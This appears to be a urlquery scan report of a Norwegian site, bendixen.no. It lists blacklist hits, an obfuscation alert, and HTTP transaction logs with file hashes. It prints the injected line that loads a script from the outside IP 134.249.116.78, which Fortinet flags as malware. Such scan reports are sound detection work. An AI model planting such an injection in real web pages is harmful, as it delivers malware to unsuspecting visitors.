Overview

URL bendixen.no/
IP 164.132.160.172
ASN
Location Italy
Report completed 2019-05-28 16:33:52 CEST
urlquery Alerts Suspicious javascript obfuscation


Settings

UserAgent Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-05-28 2 www.bendixen.no/wp-includes/js/jquery/jquery.js Malware
2019-05-28 2 134.249.116.78/jquery.js Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 164.132.160.172

Date                       UQ / IDS / BL  URL                         IP
2019-06-07 17:00:30 +0200  0 - 0 - 1      osloflagg.no/               164.132.160.172
2019-06-07 16:39:49 +0200  0 - 0 - 1      gakk.no/                    164.132.160.172
2019-06-07 16:35:08 +0200  1 - 0 - 2      bendixen.no/                164.132.160.172
2019-06-07 16:07:23 +0200  0 - 0 - 1      hjembu.no/                  164.132.160.172
2019-06-07 16:03:32 +0200  0 - 0 - 1      vitapharma.no/              164.132.160.172
2019-06-07 15:49:15 +0200  0 - 0 - 15     jabjorkeli.no/              164.132.160.172
2019-06-06 10:03:23 +0200  0 - 0 - 1      vitapharma.no/              164.132.160.172
2019-06-06 09:52:39 +0200  0 - 0 - 15     jabjorkeli.no/              164.132.160.172
2019-06-06 07:41:45 +0200  0 - 0 - 2      urmet.no/we/index.html      164.132.160.172
2019-06-06 07:41:44 +0200  0 - 0 - 1      www.urmet.no/we/index.html  164.132.160.172

Last 10 reports on ASN:

Date                       UQ / IDS / BL  URL                                                  IP
2019-07-02 09:48:15 +0200  0 - 0 - 0      https://www.imdb.com/list/ls049696316/               143.204.52.228
2019-07-02 09:48:17 +0200  0 - 0 - 0      https://www.imdb.com/list/ls049696333/               143.204.52.228
2019-07-02 09:48:03 +0200  0 - 0 - 0      https://www.spreaker.com/show/ver-peru-x-urug (...)  52.51.101.146
2019-07-01 11:37:34 +0200  0 - 0 - 0      https://www.tig-uk.com/tts/nbn4298k3o7tvns8vp (...)  144.217.235.30
2019-07-01 11:37:22 +0200  0 - 0 - 0      https://www.tig-uk.com/tts/nbn4298k3o7tvns8vp (...)  144.217.235.30
2019-07-01 11:36:59 +0200  0 - 0 - 0      https://healthadviserpro.com/power-efficiency (...)  108.179.246.37
2019-07-01 11:35:37 +0200  0 - 0 - 0      https://www.imdb.com/list/ls049291106/               143.204.52.228
2019-07-01 11:31:59 +0200  0 - 0 - 1      https://fp.bwjf.cn/downInvoice/98d3884f381b46 (...)  39.107.217.15
2019-07-01 11:28:01 +0200  0 - 0 - 0      https://d9.flashtalking.com/d9core                   52.211.104.166
2019-07-01 11:27:51 +0200  0 - 0 - 0      https://www.launchora.com/story/123movies-wat (...)  52.38.238.5

Last 10 reports on domain: bendixen.no

Date                       UQ / IDS / BL  URL           IP
2019-06-07 16:35:08 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172
2019-06-05 14:34:19 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172
2019-06-05 04:35:28 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172
2019-06-03 02:33:47 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172
2019-06-02 16:33:47 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172
2019-05-28 16:38:21 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172
2019-05-27 20:33:08 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172
2019-05-27 10:33:17 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172
2019-05-27 00:33:42 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172
2019-05-26 14:33:30 +0200  1 - 0 - 2      bendixen.no/  164.132.160.172


JavaScript

Executed Scripts (5)


Executed Evals (0)


Executed Writes (1)

#1 JavaScript::Write (size: 55, repeated: 1) - SHA256: b1247cfc4a293243fe51e76445f0c7fbdec493b931a59e722826bf77015b9514

                                        < script src = "http://134.249.116.78/jquery.js" > < /script>
                                    


HTTP Transactions (11)


Request Response
                                        
                                            GET / HTTP/1.1 
Host: bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         164.132.160.172
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Tue, 28 May 2019 14:33:14 GMT
Server: Apache
Location: http://www.bendixen.no/
Content-Length: 231
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   231
Md5:    14989e8e914e9fb4b6a2dadeaae3fe08
Sha1:   9c6c048fc20c88c70880c59253a85b307612f3a2
Sha256: 8f5df8ea3c44cfdbb5ad785ccdbd059e64e95710da2c0ebc9f3e77bbecb6de8d
                                        
                                            GET / HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-7
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.6.40, PleskLin
Cache-Control: max-age=0; private
Content-Length: 2108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   2108
Md5:    4b3109b3ab1dfc7aade96cfa68130715
Sha1:   6e752cb51bb02d263cd0f3899b280ee08b99779a
Sha256: b2b2f15e5018e2ea5a5f085f85622d4f42af09a9be140e365b6a326d3af850c1
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/style.css HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "bf1-564b8b4e29f2a"
Accept-Ranges: bytes
Content-Length: 3057
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text
Size:   3057
Md5:    b8d7077b1b872667ac2caff6f1907302
Sha1:   a78c2ba19d72ac867ffaf2a3195c4640998b0d44
Sha256: f5bdf566b34eeef2b0e03c2eb43042b1acecd2e40876cdebafcb8af6cd14abb2
                                        
                                            GET /wp-includes/js/jquery/jquery.js HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:45:52 GMT
Etag: "1ae-564b8a8c81c00"
Accept-Ranges: bytes
Content-Length: 430
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   430
Md5:    f29120bd8c33ec6329f68f36e4d028ac
Sha1:   6afb6fae0854b7689a394c6d72e924dd8d1196ae
Sha256: 93d935495f7f40deaf07b68afea7d4c953e14914a28b10412498ccd26fa859bb

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/js/modernizr.min.js HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "1c37-564b8b4e2be6a"
Accept-Ranges: bytes
Content-Length: 7223
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   7223
Md5:    858df1f1db6792962739c073a501039e
Sha1:   8f6f2d3f67d4ad50eb5d20e426228c69e3079b25
Sha256: fe3e2395a7aed8d3a915a0a9a32c18d01409e0f65343d6fd6a58d3a9738d0c28
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/js/script.js HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "45fa-564b8b4e2be6a"
Accept-Ranges: bytes
Content-Length: 17914
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   17914
Md5:    e5cc3f75fcbddc786fa7171d1c4be4f7
Sha1:   fad7b076a5ce398061c219a213af5bb5291e6d50
Sha256: 000aa44ab7528a8de4aeb26865ac9f674019e119136a18d2e7b2e5d5649c0375
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/bootstrap/js/bootstrap.js HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "e4a5-564b8b4e2aeca"
Accept-Ranges: bytes
Content-Length: 58533
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text
Size:   58533
Md5:    cf1cf2fce27179c0de8a71c73b378f07
Sha1:   44a69a91c82f22941f0fd8c9f1c459eca33d8dbe
Sha256: d88949ad637b040b893c651e938b80f8a1aabc350c94c01c28e8a38fadab2df3
                                        
                                            GET /wp-content/plugins/coming-soon/themes/default/bootstrap/css/bootstrap.min.css HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
Last-Modified: Thu, 08 Feb 2018 19:49:15 GMT
Etag: "1dc09-564b8b4e2aeca"
Accept-Ranges: bytes
Content-Length: 121865
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   121865
Md5:    ff595e039e4769a799c5f6c6852fc393
Sha1:   26108da08efc93d402632b318a411a87b7e2fd8b
Sha256: efed1b475941af7251638e000616bc486433165fd99c9f6caee01610b95ad1fc
                                        
                                            GET /jquery.js HTTP/1.1 
Host: 134.249.116.78
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bendixen.no/

                                         
                                         134.249.116.78
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 28 May 2019 14:33:19 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Sat, 11 May 2019 16:32:59 GMT
Etag: "12f2-5889f3c7d003e"
Accept-Ranges: bytes
Content-Length: 4850
Connection: close


--- Additional Info ---
Magic:  ASCII C++ program text, with very long lines
Size:   4850
Md5:    af723815beb1683ba61ccd25a7fde688
Sha1:   ed6c7f9eac74f74076eb19fc622acff44c810cc2
Sha256: b55378c9041f1e443cc2f3651bee6d7d2639856c274dd3280234b6beac5d0fed

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
                                        
Date: Tue, 28 May 2019 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.6.40, PleskLin
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.bendixen.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         164.132.160.172
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
                                        
Date: Tue, 28 May 2019 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.6.40, PleskLin
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---